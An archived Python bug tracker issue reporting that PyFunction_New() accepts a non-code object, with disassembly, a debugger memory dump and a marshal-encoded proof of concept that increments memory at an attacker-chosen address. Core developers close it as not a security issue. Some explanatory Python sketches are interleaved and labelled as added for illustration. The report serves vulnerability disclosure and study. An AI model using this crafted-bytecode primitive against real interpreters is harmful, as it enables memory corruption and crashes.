This issue tracker has been migrated to GitHub, and is currently read-only.
For more information, see the GitHub FAQs in the Python Developer Guide.

classification
Title: PyFunction_New() not validate code object
Type: security
Stage: resolved
Components: Interpreter Core
Versions: Python 2.7
process
Status: closed
Resolution: wont fix
Dependencies:
Superseder:
Assigned To:
Nosy List: JelleZijlstra, LCatro, serhiy.storchaka
Priority: normal
Keywords:

Created on 2017-03-16 08:47 by LCatro, last changed 2022-04-11 14:58 by admin. This issue is now closed.

Files
File name Uploaded Description
inc_by_one.rar LCatro, 2017-03-16 08:47 poc and crash detail
Messages (4)
msg289710 - Author: (LCatro) Date: 2017-03-16 08:47
PyFunction_New() does not validate its code argument, so a string object can be passed off as a fake code object.

This is the Python bytecode:

  LOAD_CONST 'CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC\x41\x41\x41\x41'
  MAKE_FUNCTION 0

In the source code, we can see that the string object ends up in the variable v:

TARGET(MAKE_FUNCTION)
{
    v = POP(); /* code object */  <=  now it is a string object
    x = PyFunction_New(v, f->f_globals);  <=  used here

The string object is then passed into PyFunction_New():

PyFunction_New(PyObject *code, PyObject *globals)
{
    PyFunctionObject *op = PyObject_GC_New(PyFunctionObject,
                                        &PyFunction_Type);
    static PyObject *__name__ = 0;
    if (op != NULL) {  <=  this only checks the pointer to the newly allocated object; it does not check the Python type of the code argument (which should be a code object, TYPE_CODE)
        PyObject *doc;
        PyObject *consts;
        PyObject *module;
        op->func_weakreflist = NULL;
        Py_INCREF(code);
        op->func_code = code;
        Py_INCREF(globals);
        op->func_globals = globals;
        op->func_name = ((PyCodeObject *)code)->co_name;
        Py_INCREF(op->func_name);  <=  this increments the value at an arbitrary address by one

The MAKE_CLOSURE opcode is similar:

TARGET(MAKE_CLOSURE)
{
    v = POP(); /* code object */
    x = PyFunction_New(v, f->f_globals);

The PoC and crash details are in the uploaded file.
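
For contrast, the Python-level constructor types.FunctionType does check the type of its first argument, whereas the report above concerns the C-level PyFunction_New() path reached from the MAKE_FUNCTION opcode. The following is a minimal sketch added for illustration only, not part of the original report; the helper name constructor_accepts is hypothetical.

```python
import types


def constructor_accepts(code_like):
    """Return True if types.FunctionType accepts code_like as its code argument.

    constructor_accepts is a hypothetical helper used only for this illustration.
    """
    try:
        types.FunctionType(code_like, {})
    except TypeError:
        # The Python-level constructor rejects anything that is not a code object.
        return False
    return True


real_code = compile("x = 1", "<example>", "exec")
fake_code = "C" * 32 + "AAAA"  # a string standing in for a code object

print(constructor_accepts(real_code))
print(constructor_accepts(fake_code))
```

The string is rejected with a TypeError here, so the missing check matters only when the function object is built directly from hand-crafted bytecode.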
msg289746 - Author: Jelle Zijlstra (JelleZijlstra) (Python committer) Date: 2017-03-17 07:00
I don't think this is a bug; it is known and expected that you can do all kinds of bad things by writing bytecode manually. (You can already make Python write to random memory by giving it LOAD_FAST or STORE_FAST opcodes with incorrect offsets.)

This doesn't seem to be clearly documented though; the documentation just says that bytecode can change between releases.
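
To illustrate why the interpreter normally gets away without this check, the sketch below uses the standard dis module to show that bytecode produced by the compiler loads a genuine code object before MAKE_FUNCTION. It is an illustration under assumptions: it runs on Python 3, whose opcode layout differs from the Python 2.7 build discussed in this issue, and the exact instruction sequence varies between releases.

```python
import dis
import types

# Compile an ordinary function definition; the compiler, not the user,
# decides what MAKE_FUNCTION receives.
module_code = compile("def f():\n    return 1\n", "<example>", "exec")
instructions = list(dis.get_instructions(module_code))

# Instructions whose argument is a code object (the constant later
# consumed by MAKE_FUNCTION).
code_loads = [ins for ins in instructions if isinstance(ins.argval, types.CodeType)]
opnames = [ins.opname for ins in instructions]

for ins in instructions:
    print(ins.opname)
```

Only bytecode that bypasses the compiler, as in the PoC in this issue, can place a non-code object in that position.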
msg289749 - Author: (LCatro) Date: 2017-03-17 08:56
Actually, LOAD_CONST takes a correct offset here. I wrote a Python opcode compiler, and LOAD_CONST 'CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC\x41\x41\x41\x41' is converted to LOAD_CONST 1. Looking back at the PoC, it means:

LOAD_CONST 1     => load a string object from co->co_consts onto the Python stack
MAKE_FUNCTION 0  => the interpreter first pops an object from the Python stack, then uses that object to create a function

So set a breakpoint at TARGET(MAKE_FUNCTION):

    v = POP(); /* code object */  <=  now it is a string object
    x = PyFunction_New(v, f->f_globals);

PyFunction_New(PyObject *code, PyObject *globals)  <=  now the code argument is a string object, not a code object

    op->func_name = ((PyCodeObject *)code)->co_name;  <=  look here
    Py_INCREF(op->func_name);

This compiles to the following assembly:

1e07e24e 8b4834          mov     ecx,dword ptr [eax+34h]
...
1e07e254 ff01            inc     dword ptr [ecx]

This means that whoever controls the data at offset 0x34 of the structure can cause the value at an arbitrary address to be incremented.

A Python string object's structure looks like this:
|Python_Type|String_Length|String_Data|

Break at 0x1e07e24e and look at eax:

0:000> dd eax
0204d2e0  00000003 1e1d81f8 00000024 c7554b90
0204d2f0  00000001 43434343 43434343 43434343
0204d300  43434343 43434343 43434343 43434343
0204d310  43434343 41414141 68746100 00275f5f
0204d320  0204e408 0204d3e0 fffffffd ffffffff
0204d330  00000001 1e1dbb00 01fda968 01fe28a0
0204d340  0204b590 00000000 1e1d9824 01fb1760
0204d350  00000000 00000000 01feb2c0 01ff9930

So [eax+34h] holds 0x41414141, and inc dword ptr [ecx] becomes inc dword ptr [0x41414141].
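
The offset arithmetic can be checked with a short sketch. It assumes the 32-bit Python 2.7 string layout suggested by the dump above: five 4-byte header fields (reference count, type pointer, length, hash, interned state) followed by the string data. That reading of the dump is an assumption made for this illustration, and the variable names are hypothetical.

```python
import struct

# Assumed header size on this 32-bit build: five 4-byte fields before the data.
HEADER_SIZE = 5 * 4           # 0x14
CO_NAME_OFFSET = 0x34         # from `mov ecx, dword ptr [eax+34h]`

# The constant used in the PoC: 32 filler bytes followed by the fake pointer.
payload = b"C" * 32 + b"\x41\x41\x41\x41"

# Position inside the string data that the interpreter reads as co_name.
index_in_payload = CO_NAME_OFFSET - HEADER_SIZE

# Read that position as a little-endian 32-bit pointer.
(fake_co_name,) = struct.unpack_from("<I", payload, index_in_payload)

print(hex(index_in_payload), hex(fake_co_name))
```

Under that assumption the 32 filler bytes are exactly the padding needed to place the last four bytes of the string where co_name is read.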

I triggered this by compiling the opcodes to a .pyc file, but it can also be triggered from a .py file. This is the PoC:

import marshal

code=b'\x63\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x40\x00\x00\x00\x73\x0A\x00\x00\x00\x64\x01\x00\x84\x00\x00\x64\x00\x00\x53\x28\x02\x00\x00\x00\x4E\x73\x24\x00\x00\x00\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x41\x41\x41\x41\x28\x00\x00\x00\x00\x28\x00\x00\x00\x00\x28\x00\x00\x00\x00\x28\x00\x00\x00\x00\x74\x00\x00\x00\x00\x73\x08\x00\x00\x00\x3C\x6D\x6F\x64\x75\x6C\x65\x3E\x01\x00\x00\x00\x74\x02\x00\x00\x00\x00\x01'

poc=marshal.loads(code)

exec(poc)
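
The leading bytes of the blob above can be decoded without executing anything. The sketch below is an illustration, not part of the original PoC. It assumes the Python 2.7 marshal layout for code objects (a 'c' tag, four 32-bit integers, then the bytecode as an 's' string) and uses a three-entry opcode table covering only the opcodes that appear here; the disassemble helper is hypothetical.

```python
import struct

# Leading bytes of the PoC blob: code-object header plus the bytecode string.
blob = bytes.fromhex(
    "63"                    # 'c': marshal tag for a code object
    "00000000"              # argcount
    "00000000"              # nlocals
    "01000000"              # stacksize
    "40000000"              # flags
    "73"                    # 's': marshal tag for a string (the bytecode)
    "0a000000"              # bytecode length: 10 bytes
    "640100840000640000"    # three instructions with 2-byte arguments
    "53"                    # one instruction without an argument
)

# Subset of the Python 2.7 opcode table needed for this blob (assumption:
# values taken from the 2.7 opcode numbering).
OPNAMES = {0x53: "RETURN_VALUE", 0x64: "LOAD_CONST", 0x84: "MAKE_FUNCTION"}
HAVE_ARGUMENT = 90  # opcodes at or above this value carry a 2-byte argument


def disassemble(bytecode):
    """Decode Python 2.7 style bytecode into (name, argument) pairs."""
    result = []
    i = 0
    while i < len(bytecode):
        op = bytecode[i]
        if op >= HAVE_ARGUMENT:
            (arg,) = struct.unpack_from("<H", bytecode, i + 1)
            i += 3
        else:
            arg = None
            i += 1
        result.append((OPNAMES.get(op, hex(op)), arg))
    return result


tag, argcount, nlocals, stacksize, flags = struct.unpack_from("<cIIII", blob, 0)
str_tag, length = struct.unpack_from("<cI", blob, 17)
bytecode = blob[22:22 + length]
instructions = disassemble(bytecode)

for name, arg in instructions:
    print(name, arg)
```

The decoded sequence matches the LOAD_CONST 1 / MAKE_FUNCTION 0 pair described earlier in this message, followed by the usual LOAD_CONST 0 and RETURN_VALUE that end a module.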
msg289750 - Author: Serhiy Storchaka (serhiy.storchaka) (Python committer) Date: 2017-03-17 09:16
This is a deliberate decision. In general, it is very difficult to verify bytecode for correctness (whatever correctness criterion is chosen). Any check takes time, and this would slow down execution in the normal case. This is not considered a security issue, since passing untrusted bytecode is not safe in any case.
History
Date User Action Args
2022-04-11 14:58:44 admin set github: 74011
2017-03-17 09:16:32 serhiy.storchaka set status: open -> closed; nosy: + serhiy.storchaka; messages: + msg289750; resolution: wont fix; stage: resolved
2017-03-17 08:56:17 LCatro set messages: + msg289749
2017-03-17 07:00:29 JelleZijlstra set nosy: + JelleZijlstra; messages: + msg289746
2017-03-16 08:47:57 LCatro create